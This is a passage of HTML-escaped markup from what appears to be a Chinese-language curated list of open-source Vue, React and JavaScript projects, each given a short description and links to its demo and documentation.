            &lt;a href=&quot;https://github.com/ischenliang/quickly-picture-bed&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;quickly-picture-bed&lt;/a&gt; - 一套轻量级快捷图片资源管理系统、图传系统。&lt;a href=&quot;http://v2.picture.itchenliang.club/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://ejq9qy8emd.feishu.cn/docx/Eo1HdFD7noXoSlxfRfWcYyzJnpf&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/galaxy-s10/billd-live&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;billd-live&lt;/a&gt; - 基于 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;WebRTC&lt;/code&gt; + &lt;code&gt;Node&lt;/code&gt; + &lt;code&gt;SRS&lt;/code&gt; 搭建的直播间。&lt;a href=&quot;https://live.hsslive.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/didi/xiaoju-survey&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xiaoju-survey&lt;/a&gt; - 一套轻量、安全的&lt;strong&gt;问卷系统基座&lt;/strong&gt;，提供面向个人和企业的一站式产品级解决方案，快速满足各类线上调研场景。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xunlu129/teriteri-client&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;teriteri-client&lt;/a&gt; - 一个基于 &lt;code&gt;Vue3&lt;/code&gt; 搭建的视频网站平台客户端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/antdv-pro/antdv-pro&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;antdv-pro&lt;/a&gt; - 一个基于 &lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;Vite4&lt;/code&gt;、&lt;code&gt;ant-design-vue4&lt;/code&gt;、&lt;code&gt;Pinia&lt;/code&gt;、&lt;code&gt;UnoCSS&lt;/code&gt; 和 &lt;code&gt;Typescript&lt;/code&gt; 的一整套企业级中后台前端/设计解决方案。&lt;a href=&quot;https://antdv-pro.com/dashboard/analysis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.antdv-pro.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/varletjs/varlet-app-template&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;varlet-app-template&lt;/a&gt; - 一个开箱即用的轻量化移动端 Web 模板，基于 &lt;code&gt;Vue3&lt;/code&gt;、 &lt;code&gt;Varlet&lt;/code&gt;、 &lt;code&gt;Vite&lt;/code&gt;、&lt;code&gt;Typescript&lt;/code&gt; 开发。&lt;a href=&quot;https://varlet-app-template.vercel.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zyronon/typing-word&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;typing-word&lt;/a&gt; - 可在网页上使用的背单词软件。&lt;a href=&quot;https://typing-word.ttentau.top/#/practice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Tencent/tmagic-editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tmagic-editor&lt;/a&gt; - 海报生成器。&lt;a href=&quot;https://tencent.github.io/tmagic-editor/playground/index.html#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Hacker233/resume-design&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;resume-design&lt;/a&gt; - 一款基于 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; + &lt;code&gt;Vite&lt;/code&gt; + &lt;code&gt;Element-Plus&lt;/code&gt; + &lt;code&gt;pinia&lt;/code&gt; 实现的开源免费&lt;strong&gt;简历制作神器&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Codennnn/vue-color-avatar&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-color-avatar&lt;/a&gt; - 一个纯前端实现的头像生成网站。&lt;a href=&quot;https://vue-color-avatar.leoku.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bcakmakoglu/vue-flow&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-flow&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/bcakmakoglu/vue-flow?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/bcakmakoglu/vue-flow?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/bcakmakoglu/vue-flow?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/bcakmakoglu/vue-flow?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/bcakmakoglu/vue-flow&quot; data-origin=&quot;https://img.shields.io/github/license/bcakmakoglu/vue-flow&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/bcakmakoglu/vue-flow&quot; data-origin=&quot;https://img.shields.io/github/last-commit/bcakmakoglu/vue-flow&quot; alt=&quot;&quot;/&gt; - 高度可定制的 &lt;code&gt;Vue3&lt;/code&gt; 流程图组件。&lt;a href=&quot;https://vueflow.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/readpage/undraw-ui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;undraw-ui&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/readpage/undraw-ui?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/readpage/undraw-ui?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/readpage/undraw-ui?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/readpage/undraw-ui?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/readpage/undraw-ui&quot; data-origin=&quot;https://img.shields.io/github/license/readpage/undraw-ui&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/readpage/undraw-ui&quot; data-origin=&quot;https://img.shields.io/github/last-commit/readpage/undraw-ui&quot; alt=&quot;&quot;/&gt; - 基于 &lt;code&gt;Vue3&lt;/code&gt; 的评论组件。&lt;a href=&quot;https://readpage.github.io/undraw-ui/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jason5ng32/MyIP&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MyIP&lt;/a&gt; - &lt;code&gt;IP&lt;/code&gt; 工具箱。&lt;a href=&quot;https://ipcheck.ing/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/rwv/lookscanned.io&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lookscanned.io&lt;/a&gt; - 一个能够让 &lt;code&gt;PDF&lt;/code&gt; 看起来就像是扫描件一样的纯前端网站。&lt;a href=&quot;https://lookscanned.io/scan&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/CorentinTh/it-tools&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;it-tools&lt;/a&gt; - 为开发者收集方便的在线工具，具有很好的用户体验。&lt;a href=&quot;https://it-tools.tech/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/naroat/tools-web&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tools-web&lt;/a&gt; - 只需简单几步，即可快速搭建属于自己的在线工具箱。&lt;a href=&quot;https://tools.ranblogs.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bestony/logoly&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;logoly&lt;/a&gt; - 一个 &lt;code&gt;Pornhub&lt;/code&gt; 风格的 &lt;code&gt;Logo&lt;/code&gt; 生成器。&lt;a href=&quot;https://www.logoly.pro/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xaboy/form-create-designer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;form-create-designer&lt;/a&gt; - 好用的 &lt;code&gt;Vue&lt;/code&gt; 可视化表单设计器，可以通过拖拽的方式快速创建表单。&lt;a href=&quot;https://form-create.com/v3/designer/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://view.form-create.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/itchaox/annotree&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;annotree&lt;/a&gt; - 生成文件夹目录注释树。&lt;a href=&quot;https://www.annotree.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/LokerL/tts-vue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tts-vue&lt;/a&gt; - 基于 &lt;code&gt;Electron&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;ElementPlus&lt;/code&gt; + &lt;code&gt;Vite&lt;/code&gt; 构建的&lt;strong&gt;微软语音合成工具&lt;/strong&gt;。&lt;a href=&quot;https://tts-doc.loker.vip/home.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lin-97/gi-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gi-demo&lt;/a&gt; - 一个基于 &lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;Vite&lt;/code&gt;、&lt;code&gt;TypeScript&lt;/code&gt;、&lt;code&gt;Arco Design Vue&lt;/code&gt;、&lt;code&gt;Pinia&lt;/code&gt;、&lt;code&gt;VueUse&lt;/code&gt; 等的免费中后台模版。&lt;a href=&quot;https://lin-97.github.io/gi-demo/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/yenche123/liubai&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;liubai&lt;/a&gt; - 一个集笔记、日程、待办清单和任务管理于一体的工具。&lt;a href=&quot;https://my.liubai.cc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.liubai.cc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fantastic-admin/basic&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;basic&lt;/a&gt; - 一款开箱即用的 &lt;code&gt;Vue&lt;/code&gt; 中后台管理系统框架。&lt;a href=&quot;https://fantastic-admin.hurui.me/basic-example/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://fantastic-admin.hurui.me/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;react-项目&quot;&gt;
    &lt;a href=&quot;?id=react-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;react-项目&quot;&gt;&lt;code&gt;React&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/netless-io/flat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;flat&lt;/a&gt; - 个人老师可直接使用的&lt;strong&gt;在线授课软件&lt;/strong&gt;，开箱即用前后端完全开源，快速搭建简约美观的在线教室。&lt;a href=&quot;https://flat-web.whiteboard.agora.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/oschina/tide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tide&lt;/a&gt; - 开箱即用、扩展性强、支持 &lt;code&gt;Markdown&lt;/code&gt; 语法、基础功能完善的 &lt;code&gt;React&lt;/code&gt; 富文本编辑器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/DTStack/molecule&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;molecule&lt;/a&gt; - 一个轻量的 &lt;code&gt;Web&lt;/code&gt; &lt;code&gt;IDE&lt;/code&gt; &lt;code&gt;UI&lt;/code&gt; 框架。&lt;a href=&quot;https://dtstack.github.io/molecule-examples/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/illacloud/illa-builder&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;illa-builder&lt;/a&gt; - 一个强大的开源低代码平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;span style=&quot;text-decoration:line-through;&quot;&gt;&lt;a href=&quot;https://github.com/movie-web/movie-web&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;movie-web&lt;/a&gt; - 一个在线可轻松观看电影和节目的应用程序。&lt;a href=&quot;https://movie-web.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;&lt;/span&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ant-design/ant-design-pro&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ant-design-pro&lt;/a&gt; - 开箱即用的中台前端/设计解决方案。&lt;a href=&quot;https://preview.pro.ant.design/dashboard/analysis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://pro.ant.design/zh-CN/docs/overview&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/RealKai42/qwerty-learner/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;qwerty-learner&lt;/a&gt; - 为键盘工作者设计的单词记忆与英语肌肉记忆锻炼软件。&lt;a href=&quot;https://qwerty.kaiyi.cool/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/maotoumao/MusicFree&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MusicFree&lt;/a&gt; - 插件化、定制化、无广告的免费音乐播放器。&lt;a href=&quot;https://musicfree.upup.fun/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cruip/tailwind-landing-page-template&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tailwind-landing-page-template&lt;/a&gt; - 免费、开源的落地页模板，适用于快速制作公司主页。&lt;a href=&quot;https://simple.cruip.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/joye61/pic-smaller&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pic-smaller&lt;/a&gt; - 在线图片压缩工具。&lt;a href=&quot;https://txx.cssrefs.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/CapSoftware/Cap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Cap&lt;/a&gt; - 一款简单易用的分享和录制屏幕视频工具。&lt;a href=&quot;https://cap.so/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/findyourmagic/dber&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dber&lt;/a&gt; - 基于实体连接图的数据库设计工具。&lt;a href=&quot;https://dber.tech/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bluesky-social/social-app&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;social-app&lt;/a&gt; - 适用于 &lt;code&gt;Web&lt;/code&gt;、&lt;code&gt;iOS&lt;/code&gt; 和 &lt;code&gt;Android&lt;/code&gt; 的 &lt;code&gt;Bluesky Social&lt;/code&gt; 应用程序。&lt;a href=&quot;https://bsky.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/meetqy/aspoem&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;aspoem&lt;/a&gt; - 现代化诗词学习网站，一个更加注重 &lt;code&gt;UI&lt;/code&gt; 和阅读体验的诗词网站。&lt;a href=&quot;https://aspoem.com/zh-Hans&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Cveinnt/LiveTerm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;LiveTerm&lt;/a&gt; - 在几分钟内构建终端风格的网站。&lt;a href=&quot;https://liveterm.vercel.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/umami-software/umami&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;umami&lt;/a&gt; - 一个开源的网站统计工具，可以用来分析网站的访问数据。&lt;a href=&quot;https://eu.umami.is/share/LGazGOecbDtaIwDr/umami.is&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/koodo-reader/koodo-reader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;koodo-reader&lt;/a&gt; - 一个跨平台的电子书阅读器。&lt;a href=&quot;https://reader.960960.xyz/#/manager/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://troyeguo.notion.site/Koodo-Reader-0c9c7ccdc5104a54825dfc72f1c84bea&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ourongxing/newsnow&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;newsnow&lt;/a&gt; - 优雅地阅读实时热门新闻。&lt;a href=&quot;https://newsnow.busiyi.world/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/blueedgetechno/win11React&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;win11React&lt;/a&gt; - 基于 &lt;code&gt;React&lt;/code&gt; 复刻 &lt;code&gt;Win11&lt;/code&gt;. &lt;a href=&quot;https://win11.blueedge.me/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kkoomen/pointless&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pointless&lt;/a&gt; - 一个基于 &lt;code&gt;React&lt;/code&gt; 开源的绘图画布应用。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;javascript-项目&quot;&gt;
    &lt;a href=&quot;?id=javascript-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;javascript-项目&quot;&gt;&lt;code&gt;JavaScript&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ag-grid/ag-grid&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ag-grid&lt;/a&gt; - 构建企业应用程序的 &lt;code&gt;JavaScript&lt;/code&gt; 数据表。支持 &lt;code&gt;React&lt;/code&gt; / &lt;code&gt;Angular&lt;/code&gt; / &lt;code&gt;Vue&lt;/code&gt; / &lt;code&gt;Plain JavaScript&lt;/code&gt;。&lt;a href=&quot;https://www.ag-grid.com/example/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.ag-grid.com/vue-data-grid/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tangly1024/NotionNext&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;NotionNext&lt;/a&gt; - 一个使用 &lt;code&gt;NextJS&lt;/code&gt; + &lt;code&gt;Notion API&lt;/code&gt; 实现的，部署在 &lt;code&gt;Vercel&lt;/code&gt; 上的静态博客系统。&lt;a href=&quot;https://preview.tangly1024.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wanglin2/mind-map&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mind-map&lt;/a&gt; - 一个简单&amp;amp;强大的 &lt;code&gt;Web&lt;/code&gt; 思维导图。&lt;a href=&quot;https://wanglin2.github.io/mind-map/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://wanglin2.github.io/mind-map/#/doc/zh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/didi/LogicFlow&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;LogicFlow&lt;/a&gt; - 一款流程图编辑框架，提供了一系列流程图交互、编辑所必需的功能和灵活的节点自定义、插件等拓展机制。&lt;a href=&quot;https://site.logic-flow.cn/docs/#/zh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dream-num/Luckysheet&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Luckysheet&lt;/a&gt; - 一款纯前端类似excel的在线表格，功能强大、配置简单、完全开源。&lt;a href=&quot;https://dream-num.github.io/LuckysheetDemo/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hepengwei/visualization-collection&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;visualization-collection&lt;/a&gt; - 一个专注于前端视觉效果的集合应用，包含 &lt;code&gt;CSS&lt;/code&gt; 动效、&lt;code&gt;Canvas&lt;/code&gt; 动画、人工智能应用等上百个案例。&lt;a href=&quot;http://hepengwei.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/alibaba/butterfly&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;butterfly&lt;/a&gt; - 基于 &lt;code&gt;JavaScript&lt;/code&gt;/&lt;code&gt;React&lt;/code&gt;/&lt;code&gt;Vue2&lt;/code&gt; 的流程图组件。&lt;a href=&quot;https://butterfly-dag.gitee.io/butterfly-dag/demo/analysis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
